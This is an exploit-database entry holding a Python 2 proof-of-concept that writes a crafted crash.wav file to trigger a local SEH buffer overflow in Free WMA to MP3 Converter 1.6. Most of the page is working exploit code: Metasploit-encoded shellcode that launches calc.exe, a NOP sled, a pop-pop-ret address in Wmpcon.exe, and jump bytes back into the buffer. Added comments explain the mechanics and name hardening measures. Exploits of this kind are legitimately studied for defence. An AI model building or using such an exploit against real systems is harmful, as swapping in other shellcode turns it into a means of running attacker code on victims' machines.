Free WMA to MP3 converter v1.6 - Local buffer overflow (SEH)



EKU-ID: 2834 CVE: OSVDB-ID:
Author: R3ZN0V Published: 2012-12-03 Verified: Verified


#!/usr/bin/python -w
# In the name of allah
# Title : Local buffer overflow - SEH
# Infected program: [Free WMA to MP3 converter 1.6]
# Date: 30/11/2012
# Exploit Author: [R3ZN0V]
# Software : [www.eusing.com]
# Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm]
# OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit]
# References : http://www.1337day.com/exploit/17433

#=====================================================================================#
# First, I'd like to thank b33f for all his cooperation (always the best man ;) ).    #
# I struggled a lot before this became a working exploit, with a few problems in      #
# bad-character analysis and in executing my shellcode, which is in memory after      #
# tracing the bad characters. If you look closely at the path you'll see something    #
# weird: two 0D bytes are added automatically, like this:                             #
# 09 (0D) 0A 0B 0C (0D). I've no idea what caused that; the first 0D is the problem,  #
# probably like a null byte. However, go to Metasploit and work this out by bad-char  #
# analysis, and try replacing the shell with another one using this command:          #
# msfencode -b '\x00\x0a', obviously it won't work.                                   #
#=====================================================================================#

# Proof-of-concept generator: writes "crash.wav", an over-long input file for
# Free WMA to MP3 Converter 1.6 (see the header above). Python 2 only: the
# string literals are byte strings and `print` is used as a statement.
#
# The output is not a real WAV file: it starts with 0x90 bytes instead of a
# RIFF header, so a parser that validates the header and bounds the length of
# what it copies would reject it. That missing check is the root cause being
# demonstrated; the vulnerable code itself is not shown on this page.
#
# NOTE(review): `file` and `buffer` shadow Python 2 builtins.
file = "crash.wav"


# Demonstration payload, generated by the author with:
# windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t c <========= 227 byte iteration=1 =========>
# It only launches calc.exe; 0x00, 0x0a and 0x0d are excluded as bad characters.
shell = ("\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\xc2\x0f\x5e\x65\x33\xc9\xb1"
"\x33\x31\x47\x17\x83\xc7\x04\x03\x85\x1c\xbc\x90\xf5\xcb\xc9"
"\x5b\x05\x0c\xaa\xd2\xe0\x3d\xf8\x81\x61\x6f\xcc\xc2\x27\x9c"
"\xa7\x87\xd3\x17\xc5\x0f\xd4\x90\x60\x76\xdb\x21\x45\xb6\xb7"
"\xe2\xc7\x4a\xc5\x36\x28\x72\x06\x4b\x29\xb3\x7a\xa4\x7b\x6c"
"\xf1\x17\x6c\x19\x47\xa4\x8d\xcd\xcc\x94\xf5\x68\x12\x60\x4c"
"\x72\x42\xd9\xdb\x3c\x7a\x51\x83\x9c\x7b\xb6\xd7\xe1\x32\xb3"
"\x2c\x91\xc5\x15\x7d\x5a\xf4\x59\xd2\x65\x39\x54\x2a\xa1\xfd"
"\x87\x59\xd9\xfe\x3a\x5a\x1a\x7d\xe1\xef\xbf\x25\x62\x57\x64"
"\xd4\xa7\x0e\xef\xda\x0c\x44\xb7\xfe\x93\x89\xc3\xfa\x18\x2c"
"\x04\x8b\x5b\x0b\x80\xd0\x38\x32\x91\xbc\xef\x4b\xc1\x18\x4f"
"\xee\x89\x8a\x84\x88\xd3\xc0\x5b\x18\x6e\xad\x5c\x22\x71\x9d"
"\x34\x13\xfa\x72\x42\xac\x29\x37\xb2\x5d\xe0\xad\x23\xc4\x91"
"\x8c\x29\xf7\x4f\xd2\x57\x74\x7a\xaa\xa3\x64\x0f\xaf\xe8\x22"
"\xe3\xdd\x61\xc7\x03\x72\x81\xc2\x67\x15\x11\x8e\x49\xb0\x91"
"\x35\x96")  


# Buffer layout: 11 NOP bytes + payload, 'A' filler up to offset 4116, then
# junk1 (4 bytes), junk2 (4 bytes), junk3 (5 bytes) and 50 'C' bytes.
# Presumably offset 4116 is where the SEH record sits in the target (the
# title says SEH overwrite); the page does not show how it was measured.
#
# Mitigation note: per the author's own note on junk2, the technique depends
# on Wmpcon.exe being loaded at a fixed address without SafeSEH. Linking the
# module with /SAFESEH and /DYNAMICBASE, or enabling SEHOP on the host, is the
# standard hardening against this class of handler overwrite.
evil = "\x90" * 11 + shell # author's note: do not shrink these NOPs or the exploit won't work, in case the shellcode is replaced
junk1 = "\xEB\x06\x90\x90" # short jump (EB 06) forward over the 4 bytes of junk2 to the near jump in junk3; 90 90 is padding
junk2 = "\x56\x23\x40\x00" # 0x00402356 (little-endian): pop pop retn in Wmpcon.exe; author's note: Rebase=false, aslr=false, seh=unsafe, os=false
junk3 = "\xE9\xEA\xEF\xFF\xFF" # near jump (E9) back to the beginning of the buffer; rel32 0xFFFFEFEA is -4118, although the original note says 4108
junk4 = "C"*50  # trailing filler after the overwritten record
buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4

# Write the assembled bytes to crash.wav in the current directory.
text = open(file, "w")
text.write(buffer)
text.close()
print "\t\n The file has been created :) "